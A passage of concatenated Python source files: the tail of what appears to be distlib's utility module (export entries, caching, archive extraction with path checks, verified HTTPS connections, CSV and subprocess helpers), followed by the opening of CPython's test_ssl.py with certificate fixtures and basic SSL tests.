\s*(\[\s*(?P<flags>\w+(=\w+)?(,\s*\w+(=\w+)?)*)\s*\])?
""",
re.VERBOSE,
)
def get_export_entry(specification):
m = ENTRY_RE.search(specification)
if not m:
result = None
if "[" in specification or "]" in specification:
raise DistlibException("Invalid specification " "'%s'" % specification)
else:
d = m.groupdict()
name = d["name"]
path = d["callable"]
colons = path.count(":")
if colons == 0:
prefix, suffix = path, None
else:
if colons != 1:
raise DistlibException("Invalid specification " "'%s'" % specification)
prefix, suffix = path.split(":")
flags = d["flags"]
if flags is None:
if "[" in specification or "]" in specification:
raise DistlibException("Invalid specification " "'%s'" % specification)
flags = []
else:
flags = [f.strip() for f in flags.split(",")]
result = ExportEntry(name, prefix, suffix, flags)
return result
def get_cache_base(suffix=None):
"""
Return the default base location for distlib caches. If the directory does
not exist, it is created. Use the suffix provided for the base directory,
and default to '.distlib' if it isn't provided.
On Windows, if LOCALAPPDATA is defined in the environment, then it is
assumed to be a directory, and will be the parent directory of the result.
On POSIX, and on Windows if LOCALAPPDATA is not defined, the user's home
directory - using os.expanduser('~') - will be the parent directory of
the result.
The result is just the directory '.distlib' in the parent directory as
determined above, or with the name specified with ``suffix``.
"""
if suffix is None:
suffix = ".distlib"
if os.name == "nt" and "LOCALAPPDATA" in os.environ:
result = os.path.expandvars("$localappdata")
else:
# Assume posix, or old Windows
result = os.path.expanduser("~")
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if os.path.isdir(result):
usable = os.access(result, os.W_OK)
if not usable:
logger.warning("Directory exists but is not writable: %s", result)
else:
try:
os.makedirs(result)
usable = True
except OSError:
logger.warning("Unable to create %s", result, exc_info=True)
usable = False
if not usable:
result = tempfile.mkdtemp()
logger.warning("Default location unusable, using %s", result)
return os.path.join(result, suffix)
def path_to_cache_dir(path):
"""
Convert an absolute path to a directory name for use in a cache.
The algorithm used is:
#. On Windows, any ``':'`` in the drive is replaced with ``'---'``.
#. Any occurrence of ``os.sep`` is replaced with ``'--'``.
#. ``'.cache'`` is appended.
"""
d, p = os.path.splitdrive(os.path.abspath(path))
if d:
d = d.replace(":", "---")
p = p.replace(os.sep, "--")
return d + p + ".cache"
def ensure_slash(s):
if not s.endswith("/"):
return s + "/"
return s
def parse_credentials(netloc):
username = password = None
if "@" in netloc:
prefix, netloc = netloc.split("@", 1)
if ":" not in prefix:
username = prefix
else:
username, password = prefix.split(":", 1)
return username, password, netloc
def get_process_umask():
result = os.umask(0o22)
os.umask(result)
return result
def is_string_sequence(seq):
result = True
i = None
for i, s in enumerate(seq):
if not isinstance(s, string_types):
result = False
break
assert i is not None
return result
PROJECT_NAME_AND_VERSION = re.compile(
"([a-z0-9_]+([.-][a-z_][a-z0-9_]*)*)-" "([a-z0-9_.+-]+)", re.I
)
PYTHON_VERSION = re.compile(r"-py(\d\.?\d?)")
def split_filename(filename, project_name=None):
"""
Extract name, version, python version from a filename (no extension)
Return name, version, pyver or None
"""
result = None
pyver = None
filename = unquote(filename).replace(" ", "-")
m = PYTHON_VERSION.search(filename)
if m:
pyver = m.group(1)
filename = filename[: m.start()]
if project_name and len(filename) > len(project_name) + 1:
m = re.match(re.escape(project_name) + r"\b", filename)
if m:
n = m.end()
result = filename[:n], filename[n + 1 :], pyver
if result is None:
m = PROJECT_NAME_AND_VERSION.match(filename)
if m:
result = m.group(1), m.group(3), pyver
return result
# Allow spaces in name because of legacy dists like "Twisted Core"
NAME_VERSION_RE = re.compile(r"(?P<name>[\w .-]+)\s*" r"\(\s*(?P<ver>[^\s)]+)\)$")
def parse_name_and_version(p):
"""
A utility method used to get name and version from a string.
From e.g. a Provides-Dist value.
:param p: A value in a form 'foo (1.0)'
:return: The name and version as a tuple.
"""
m = NAME_VERSION_RE.match(p)
if not m:
raise DistlibException("Ill-formed name/version string: '%s'" % p)
d = m.groupdict()
return d["name"].strip().lower(), d["ver"]
def get_extras(requested, available):
result = set()
requested = set(requested or [])
available = set(available or [])
if "*" in requested:
requested.remove("*")
result |= available
for r in requested:
if r == "-":
result.add(r)
elif r.startswith("-"):
unwanted = r[1:]
if unwanted not in available:
logger.warning("undeclared extra: %s" % unwanted)
if unwanted in result:
result.remove(unwanted)
else:
if r not in available:
logger.warning("undeclared extra: %s" % r)
result.add(r)
return result
#
# Extended metadata functionality
#
def _get_external_data(url):
result = {}
try:
# urlopen might fail if it runs into redirections,
# because of Python issue #13696. Fixed in locators
# using a custom redirect handler.
resp = urlopen(url)
headers = resp.info()
ct = headers.get("Content-Type")
if not ct.startswith("application/json"):
logger.debug("Unexpected response for JSON request: %s", ct)
else:
reader = codecs.getreader("utf-8")(resp)
# data = reader.read().decode('utf-8')
# result = json.loads(data)
result = json.load(reader)
except Exception as e:
logger.exception("Failed to get external data for %s: %s", url, e)
return result
_external_data_base_url = "https://www.red-dove.com/pypi/projects/"
def get_project_data(name):
url = "%s/%s/project.json" % (name[0].upper(), name)
url = urljoin(_external_data_base_url, url)
result = _get_external_data(url)
return result
def get_package_data(name, version):
url = "%s/%s/package-%s.json" % (name[0].upper(), name, version)
url = urljoin(_external_data_base_url, url)
return _get_external_data(url)
class Cache(object):
"""
A class implementing a cache for resources that need to live in the file system
e.g. shared libraries. This class was moved from resources to here because it
could be used by other modules, e.g. the wheel module.
"""
def __init__(self, base):
"""
Initialise an instance.
:param base: The base directory where the cache should be located.
"""
# we use 'isdir' instead of 'exists', because we want to
# fail if there's a file with that name
if not os.path.isdir(base): # pragma: no cover
os.makedirs(base)
if (os.stat(base).st_mode & 0o77) != 0:
logger.warning("Directory '%s' is not private", base)
self.base = os.path.abspath(os.path.normpath(base))
def prefix_to_dir(self, prefix):
"""
Converts a resource prefix to a directory name in the cache.
"""
return path_to_cache_dir(prefix)
def clear(self):
"""
Clear the cache.
"""
not_removed = []
for fn in os.listdir(self.base):
fn = os.path.join(self.base, fn)
try:
if os.path.islink(fn) or os.path.isfile(fn):
os.remove(fn)
elif os.path.isdir(fn):
shutil.rmtree(fn)
except Exception:
not_removed.append(fn)
return not_removed
class EventMixin(object):
"""
A very simple publish/subscribe system.
"""
def __init__(self):
self._subscribers = {}
def add(self, event, subscriber, append=True):
"""
Add a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be added (and called when the
event is published).
:param append: Whether to append or prepend the subscriber to an
existing subscriber list for the event.
"""
subs = self._subscribers
if event not in subs:
subs[event] = deque([subscriber])
else:
sq = subs[event]
if append:
sq.append(subscriber)
else:
sq.appendleft(subscriber)
def remove(self, event, subscriber):
"""
Remove a subscriber for an event.
:param event: The name of an event.
:param subscriber: The subscriber to be removed.
"""
subs = self._subscribers
if event not in subs:
raise ValueError("No subscribers: %r" % event)
subs[event].remove(subscriber)
def get_subscribers(self, event):
"""
Return an iterator for the subscribers for an event.
:param event: The event to return subscribers for.
"""
return iter(self._subscribers.get(event, ()))
def publish(self, event, *args, **kwargs):
"""
Publish a event and return a list of values returned by its
subscribers.
:param event: The event to publish.
:param args: The positional arguments to pass to the event's
subscribers.
:param kwargs: The keyword arguments to pass to the event's
subscribers.
"""
result = []
for subscriber in self.get_subscribers(event):
try:
value = subscriber(event, *args, **kwargs)
except Exception:
logger.exception("Exception during event publication")
value = None
result.append(value)
logger.debug(
"publish %s: args = %s, kwargs = %s, result = %s",
event,
args,
kwargs,
result,
)
return result
#
# Simple sequencing
#
class Sequencer(object):
def __init__(self):
self._preds = {}
self._succs = {}
self._nodes = set() # nodes with no preds/succs
def add_node(self, node):
self._nodes.add(node)
def remove_node(self, node, edges=False):
if node in self._nodes:
self._nodes.remove(node)
if edges:
for p in set(self._preds.get(node, ())):
self.remove(p, node)
for s in set(self._succs.get(node, ())):
self.remove(node, s)
# Remove empties
for k, v in list(self._preds.items()):
if not v:
del self._preds[k]
for k, v in list(self._succs.items()):
if not v:
del self._succs[k]
def add(self, pred, succ):
assert pred != succ
self._preds.setdefault(succ, set()).add(pred)
self._succs.setdefault(pred, set()).add(succ)
def remove(self, pred, succ):
assert pred != succ
try:
preds = self._preds[succ]
succs = self._succs[pred]
except KeyError: # pragma: no cover
raise ValueError("%r not a successor of anything" % succ)
try:
preds.remove(pred)
succs.remove(succ)
except KeyError: # pragma: no cover
raise ValueError("%r not a successor of %r" % (succ, pred))
def is_step(self, step):
return step in self._preds or step in self._succs or step in self._nodes
def get_steps(self, final):
if not self.is_step(final):
raise ValueError("Unknown: %r" % final)
result = []
todo = []
seen = set()
todo.append(final)
while todo:
step = todo.pop(0)
if step in seen:
# if a step was already seen,
# move it to the end (so it will appear earlier
# when reversed on return) ... but not for the
# final step, as that would be confusing for
# users
if step != final:
result.remove(step)
result.append(step)
else:
seen.add(step)
result.append(step)
preds = self._preds.get(step, ())
todo.extend(preds)
return reversed(result)
@property
def strong_connections(self):
# http://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm
index_counter = [0]
stack = []
lowlinks = {}
index = {}
result = []
graph = self._succs
def strongconnect(node):
# set the depth index for this node to the smallest unused index
index[node] = index_counter[0]
lowlinks[node] = index_counter[0]
index_counter[0] += 1
stack.append(node)
# Consider successors
try:
successors = graph[node]
except Exception:
successors = []
for successor in successors:
if successor not in lowlinks:
# Successor has not yet been visited
strongconnect(successor)
lowlinks[node] = min(lowlinks[node], lowlinks[successor])
elif successor in stack:
# the successor is in the stack and hence in the current
# strongly connected component (SCC)
lowlinks[node] = min(lowlinks[node], index[successor])
# If `node` is a root node, pop the stack and generate an SCC
if lowlinks[node] == index[node]:
connected_component = []
while True:
successor = stack.pop()
connected_component.append(successor)
if successor == node:
break
component = tuple(connected_component)
# storing the result
result.append(component)
for node in graph:
if node not in lowlinks:
strongconnect(node)
return result
@property
def dot(self):
result = ["digraph G {"]
for succ in self._preds:
preds = self._preds[succ]
for pred in preds:
result.append(" %s -> %s;" % (pred, succ))
for node in self._nodes:
result.append(" %s;" % node)
result.append("}")
return "\n".join(result)
#
# Unarchiving functionality for zip, tar, tgz, tbz, whl
#
ARCHIVE_EXTENSIONS = (".tar.gz", ".tar.bz2", ".tar", ".zip", ".tgz", ".tbz", ".whl")
def unarchive(archive_filename, dest_dir, format=None, check=True):
def check_path(path):
if not isinstance(path, text_type):
path = path.decode("utf-8")
p = os.path.abspath(os.path.join(dest_dir, path))
if not p.startswith(dest_dir) or p[plen] != os.sep:
raise ValueError("path outside destination: %r" % p)
dest_dir = os.path.abspath(dest_dir)
plen = len(dest_dir)
archive = None
if format is None:
if archive_filename.endswith((".zip", ".whl")):
format = "zip"
elif archive_filename.endswith((".tar.gz", ".tgz")):
format = "tgz"
mode = "r:gz"
elif archive_filename.endswith((".tar.bz2", ".tbz")):
format = "tbz"
mode = "r:bz2"
elif archive_filename.endswith(".tar"):
format = "tar"
mode = "r"
else: # pragma: no cover
raise ValueError("Unknown format for %r" % archive_filename)
try:
if format == "zip":
archive = ZipFile(archive_filename, "r")
if check:
names = archive.namelist()
for name in names:
check_path(name)
else:
archive = tarfile.open(archive_filename, mode)
if check:
names = archive.getnames()
for name in names:
check_path(name)
if format != "zip" and sys.version_info[0] < 3:
# See Python issue 17153. If the dest path contains Unicode,
# tarfile extraction fails on Python 2.x if a member path name
# contains non-ASCII characters - it leads to an implicit
# bytes -> unicode conversion using ASCII to decode.
for tarinfo in archive.getmembers():
if not isinstance(tarinfo.name, text_type):
tarinfo.name = tarinfo.name.decode("utf-8")
archive.extractall(dest_dir)
finally:
if archive:
archive.close()
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with ZipFile(result, "w") as zf:
for root, dirs, files in os.walk(directory):
for name in files:
full = os.path.join(root, name)
rel = root[dlen:]
dest = os.path.join(rel, name)
zf.write(full, dest)
return result
#
# Simple progress bar
#
UNITS = ("", "K", "M", "G", "T", "P")
class Progress(object):
unknown = "UNKNOWN"
def __init__(self, minval=0, maxval=100):
assert maxval is None or maxval >= minval
self.min = self.cur = minval
self.max = maxval
self.started = None
self.elapsed = 0
self.done = False
def update(self, curval):
assert self.min <= curval
assert self.max is None or curval <= self.max
self.cur = curval
now = time.time()
if self.started is None:
self.started = now
else:
self.elapsed = now - self.started
def increment(self, incr):
assert incr >= 0
self.update(self.cur + incr)
def start(self):
self.update(self.min)
return self
def stop(self):
if self.max is not None:
self.update(self.max)
self.done = True
@property
def maximum(self):
return self.unknown if self.max is None else self.max
@property
def percentage(self):
if self.done:
result = "100 %"
elif self.max is None:
result = " ?? %"
else:
v = 100.0 * (self.cur - self.min) / (self.max - self.min)
result = "%3d %%" % v
return result
def format_duration(self, duration):
if (duration <= 0) and self.max is None or self.cur == self.min:
result = "??:??:??"
# elif duration < 1:
# result = '--:--:--'
else:
result = time.strftime("%H:%M:%S", time.gmtime(duration))
return result
@property
def ETA(self):
if self.done:
prefix = "Done"
t = self.elapsed
# import pdb; pdb.set_trace()
else:
prefix = "ETA "
if self.max is None:
t = -1
elif self.elapsed == 0 or (self.cur == self.min):
t = 0
else:
# import pdb; pdb.set_trace()
t = float(self.max - self.min)
t /= self.cur - self.min
t = (t - 1) * self.elapsed
return "%s: %s" % (prefix, self.format_duration(t))
@property
def speed(self):
if self.elapsed == 0:
result = 0.0
else:
result = (self.cur - self.min) / self.elapsed
for unit in UNITS:
if result < 1000:
break
result /= 1000.0
return "%d %sB/s" % (result, unit)
#
# Glob functionality
#
RICH_GLOB = re.compile(r"\{([^}]*)\}")
_CHECK_RECURSIVE_GLOB = re.compile(r"[^/\\,{]\*\*|\*\*[^/\\,}]")
_CHECK_MISMATCH_SET = re.compile(r"^[^{]*\}|\{[^}]*$")
def iglob(path_glob):
"""Extended globbing function that supports ** and {opt1,opt2,opt3}."""
if _CHECK_RECURSIVE_GLOB.search(path_glob):
msg = """invalid glob %r: recursive glob "**" must be used alone"""
raise ValueError(msg % path_glob)
if _CHECK_MISMATCH_SET.search(path_glob):
msg = """invalid glob %r: mismatching set marker '{' or '}'"""
raise ValueError(msg % path_glob)
return _iglob(path_glob)
def _iglob(path_glob):
rich_path_glob = RICH_GLOB.split(path_glob, 1)
if len(rich_path_glob) > 1:
assert len(rich_path_glob) == 3, rich_path_glob
prefix, set, suffix = rich_path_glob
for item in set.split(","):
for path in _iglob("".join((prefix, item, suffix))):
yield path
else:
if "**" not in path_glob:
for item in std_iglob(path_glob):
yield item
else:
prefix, radical = path_glob.split("**", 1)
if prefix == "":
prefix = "."
if radical == "":
radical = "*"
else:
# we support both
radical = radical.lstrip("/")
radical = radical.lstrip("\\")
for path, dir, files in os.walk(prefix):
path = os.path.normpath(path)
for fn in _iglob(os.path.join(path, radical)):
yield fn
if ssl:
from .compat import (
HTTPSHandler as BaseHTTPSHandler,
match_hostname,
CertificateError,
)
#
# HTTPSConnection which verifies certificates/matches domains
#
class HTTPSConnection(httplib.HTTPSConnection):
ca_certs = None # set this to the path to the certs file (.pem)
check_domain = True # only used if ca_certs is not None
# noinspection PyPropertyAccess
def connect(self):
sock = socket.create_connection((self.host, self.port), self.timeout)
if getattr(self, "_tunnel_host", False):
self.sock = sock
self._tunnel()
if not hasattr(ssl, "SSLContext"):
# For 2.x
if self.ca_certs:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
self.sock = ssl.wrap_socket(
sock,
self.key_file,
self.cert_file,
cert_reqs=cert_reqs,
ssl_version=ssl.PROTOCOL_SSLv23,
ca_certs=self.ca_certs,
)
else: # pragma: no cover
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.options |= ssl.OP_NO_SSLv2
if self.cert_file:
context.load_cert_chain(self.cert_file, self.key_file)
kwargs = {}
if self.ca_certs:
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(cafile=self.ca_certs)
if getattr(ssl, "HAS_SNI", False):
kwargs["server_hostname"] = self.host
self.sock = context.wrap_socket(sock, **kwargs)
if self.ca_certs and self.check_domain:
try:
match_hostname(self.sock.getpeercert(), self.host)
logger.debug("Host verified: %s", self.host)
except CertificateError: # pragma: no cover
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
raise
class HTTPSHandler(BaseHTTPSHandler):
def __init__(self, ca_certs, check_domain=True):
BaseHTTPSHandler.__init__(self)
self.ca_certs = ca_certs
self.check_domain = check_domain
def _conn_maker(self, *args, **kwargs):
"""
This is called to create a connection instance. Normally you'd
pass a connection class to do_open, but it doesn't actually check for
a class, and just expects a callable. As long as we behave just as a
constructor would have, we should be OK. If it ever changes so that
we *must* pass a class, we'll create an UnsafeHTTPSConnection class
which just sets check_domain to False in the class definition, and
choose which one to pass to do_open.
"""
result = HTTPSConnection(*args, **kwargs)
if self.ca_certs:
result.ca_certs = self.ca_certs
result.check_domain = self.check_domain
return result
def https_open(self, req):
try:
return self.do_open(self._conn_maker, req)
except URLError as e:
if "certificate verify failed" in str(e.reason):
raise CertificateError(
"Unable to verify server certificate " "for %s" % req.host
)
else:
raise
#
# To prevent against mixing HTTP traffic with HTTPS (examples: A Man-In-The-
# Middle proxy using HTTP listens on port 443, or an index mistakenly serves
# HTML containing a http://xyz link when it should be https://xyz),
# you can use the following handler class, which does not allow HTTP traffic.
#
# It works by inheriting from HTTPHandler - so build_opener won't add a
# handler for HTTP itself.
#
class HTTPSOnlyHandler(HTTPSHandler, HTTPHandler):
def http_open(self, req):
raise URLError(
"Unexpected HTTP request on what should be a secure "
"connection: %s" % req
)
#
# XML-RPC with timeouts
#
_ver_info = sys.version_info[:2]
if _ver_info == (2, 6):
class HTTP(httplib.HTTP):
def __init__(self, host="", port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
if ssl:
class HTTPS(httplib.HTTPS):
def __init__(self, host="", port=None, **kwargs):
if port == 0: # 0 means use port 0, not the default port
port = None
self._setup(self._connection_class(host, port, **kwargs))
class Transport(xmlrpclib.Transport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.Transport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, x509 = self.get_host_info(host)
if _ver_info == (2, 6):
result = HTTP(h, timeout=self.timeout)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPConnection(h)
result = self._connection[1]
return result
if ssl:
class SafeTransport(xmlrpclib.SafeTransport):
def __init__(self, timeout, use_datetime=0):
self.timeout = timeout
xmlrpclib.SafeTransport.__init__(self, use_datetime)
def make_connection(self, host):
h, eh, kwargs = self.get_host_info(host)
if not kwargs:
kwargs = {}
kwargs["timeout"] = self.timeout
if _ver_info == (2, 6):
result = HTTPS(host, None, **kwargs)
else:
if not self._connection or host != self._connection[0]:
self._extra_headers = eh
self._connection = host, httplib.HTTPSConnection(h, None, **kwargs)
result = self._connection[1]
return result
class ServerProxy(xmlrpclib.ServerProxy):
def __init__(self, uri, **kwargs):
self.timeout = timeout = kwargs.pop("timeout", None)
# The above classes only come into play if a timeout
# is specified
if timeout is not None:
scheme, _ = splittype(uri)
use_datetime = kwargs.get("use_datetime", 0)
if scheme == "https":
tcls = SafeTransport
else:
tcls = Transport
kwargs["transport"] = t = tcls(timeout, use_datetime=use_datetime)
self.transport = t
xmlrpclib.ServerProxy.__init__(self, uri, **kwargs)
#
# CSV functionality. This is provided because on 2.x, the csv module can't
# handle Unicode. However, we need to deal with Unicode in e.g. RECORD files.
#
def _csv_open(fn, mode, **kwargs):
if sys.version_info[0] < 3:
mode += "b"
else:
kwargs["newline"] = ""
# Python 3 determines encoding from locale. Force 'utf-8'
# file encoding to match other forced utf-8 encoding
kwargs["encoding"] = "utf-8"
return open(fn, mode, **kwargs)
class CSVBase(object):
defaults = {
"delimiter": str(","), # The strs are used because we need native
"quotechar": str('"'), # str in the csv API (2.x won't take
"lineterminator": str("\n"), # Unicode)
}
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.stream.close()
class CSVReader(CSVBase):
def __init__(self, **kwargs):
if "stream" in kwargs:
stream = kwargs["stream"]
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader("utf-8")(stream)
self.stream = stream
else:
self.stream = _csv_open(kwargs["path"], "r")
self.reader = csv.reader(self.stream, **self.defaults)
def __iter__(self):
return self
def next(self):
result = next(self.reader)
if sys.version_info[0] < 3:
for i, item in enumerate(result):
if not isinstance(item, text_type):
result[i] = item.decode("utf-8")
return result
__next__ = next
class CSVWriter(CSVBase):
def __init__(self, fn, **kwargs):
self.stream = _csv_open(fn, "w")
self.writer = csv.writer(self.stream, **self.defaults)
def writerow(self, row):
if sys.version_info[0] < 3:
r = []
for item in row:
if isinstance(item, text_type):
item = item.encode("utf-8")
r.append(item)
row = r
self.writer.writerow(row)
#
# Configurator functionality
#
class Configurator(BaseConfigurator):
value_converters = dict(BaseConfigurator.value_converters)
value_converters["inc"] = "inc_convert"
def __init__(self, config, base=None):
super(Configurator, self).__init__(config)
self.base = base or os.getcwd()
def configure_custom(self, config):
def convert(o):
if isinstance(o, (list, tuple)):
result = type(o)([convert(i) for i in o])
elif isinstance(o, dict):
if "()" in o:
result = self.configure_custom(o)
else:
result = {}
for k in o:
result[k] = convert(o[k])
else:
result = self.convert(o)
return result
c = config.pop("()")
if not callable(c):
c = self.resolve(c)
props = config.pop(".", None)
# Check for valid identifiers
args = config.pop("[]", ())
if args:
args = tuple([convert(o) for o in args])
items = [(k, convert(config[k])) for k in config if valid_ident(k)]
kwargs = dict(items)
result = c(*args, **kwargs)
if props:
for n, v in props.items():
setattr(result, n, convert(v))
return result
def __getitem__(self, key):
result = self.config[key]
if isinstance(result, dict) and "()" in result:
self.config[key] = result = self.configure_custom(result)
return result
def inc_convert(self, value):
"""Default converter for the inc:// protocol."""
if not os.path.isabs(value):
value = os.path.join(self.base, value)
with codecs.open(value, "r", encoding="utf-8") as f:
result = json.load(f)
return result
class SubprocessMixin(object):
"""
Mixin for running subprocesses and capturing their output
"""
def __init__(self, verbose=False, progress=None):
self.verbose = verbose
self.progress = progress
def reader(self, stream, context):
"""
Read lines from a subprocess' output stream and either pass to a progress
callable (if specified) or write progress information to sys.stderr.
"""
progress = self.progress
verbose = self.verbose
while True:
s = stream.readline()
if not s:
break
if progress is not None:
progress(s, context)
else:
if not verbose:
sys.stderr.write(".")
else:
sys.stderr.write(s.decode("utf-8"))
sys.stderr.flush()
stream.close()
def run_command(self, cmd, **kwargs):
p = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs
)
t1 = threading.Thread(target=self.reader, args=(p.stdout, "stdout"))
t1.start()
t2 = threading.Thread(target=self.reader, args=(p.stderr, "stderr"))
t2.start()
p.wait()
t1.join()
t2.join()
if self.progress is not None:
self.progress("done.", "main")
elif self.verbose:
sys.stderr.write("done.\n")
return p
def normalize_name(name):
"""Normalize a python package name a la PEP 503"""
# https://www.python.org/dev/peps/pep-0503/#normalized-names
return re.sub("[-_.]+", "-", name).lower()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
